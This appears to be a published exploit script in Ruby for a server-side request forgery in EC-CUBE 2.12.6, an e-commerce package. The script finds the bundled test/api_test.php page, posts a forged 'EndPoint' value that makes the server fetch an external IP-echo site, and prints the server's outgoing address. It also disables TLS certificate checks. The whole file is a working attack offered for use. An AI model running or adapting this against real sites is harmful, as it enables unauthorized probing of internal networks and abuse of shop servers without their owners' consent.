# Exploit Title: EC-CUBE 2.12.6 Server-Side Request Forgery
# Date: 22/10/16
# Exploit Author: Wad Deek
# Vendor Homepage: http://en.ec-cube.net/
# Software Link: http://en.ec-cube.net/download/
# Version: 2.12.6en-p1
# Tested on: Xampp on Windows7
# Fuzzing tool: https://github.com/Trouiller-David/PHP-Source-Code-Analysis-Tools
##
##
#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
require('mechanize')

# HTTP client setup: short timeouts, follow redirects, no TLS certificate checking
agent = Mechanize.new()
agent.read_timeout = 3
agent.open_timeout = 3
agent.keep_alive = false
agent.redirect_ok = true
agent.agent.http.verify_mode = OpenSSL::SSL::VERIFY_NONE
#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#===========================
# One base URL per line; each is checked in turn
urls = <<URLS
http://localhost/eccube/
URLS
urls.split("\n").each() do |url|
#===========================
#{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{
  # GET a URL; returns [status code, body], or nil if the request raised
  def get(agent, target)
    begin
      response = agent.get(target)
      code = response.code()
      body = response.body()
    rescue
    else
      return code, body
    end
  end
#{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{

#}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
  # The vulnerable page is the bundled API test script shipped with EC-CUBE
  target = url+"test/api_test.php"
  code, body = get(agent, target)
  if(code == "200" && body.include?("EC-CUBE API TEST") == true)
    begin
      # The server fetches whatever "EndPoint" names; here an external
      # IP-echo site, so the response reveals the server's egress address
      response = agent.post(target, {
        "AccessKeyId" => 4111111111111111,
        "arg_key0" => 1, "arg_key1" => 1, "arg_key2" => 1, "arg_key3" => 1, "arg_key4" => 1,
        "arg_key5" => 1, "arg_key6" => 1, "arg_key7" => 1, "arg_key8" => 1, "arg_key9" => 1,
        "arg_val0" => 1, "arg_val1" => 1, "arg_val2" => 1, "arg_val3" => 1, "arg_val4" => 1,
        "arg_val5" => 1, "arg_val6" => 1, "arg_val7" => 1, "arg_val8" => 1, "arg_val9" => 1,
        #????????????????????????????????????????????????????????????
        "EndPoint" => "http://www.monip.org/index.php"+"?.jpg",
        #????????????????????????????????????????????????????????????
        "mode=" => "",
        "Operation" => 1,
        "SecretKey" => 1,
        "Service" => 1,
        "Signature" => 1,
        "Timestamp" => 1,
        "type" => "index.php"
      })
      body = response.body()
    rescue
    else
      # Pull the echoed address out of the relayed monip.org page
      ip = response.body().scan(/IP : (.+?)</).join()
      puts("[+] "+target+" >>>> monip.org >>>> "+ip)
    end
  end
#}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
#===========================
end
#===========================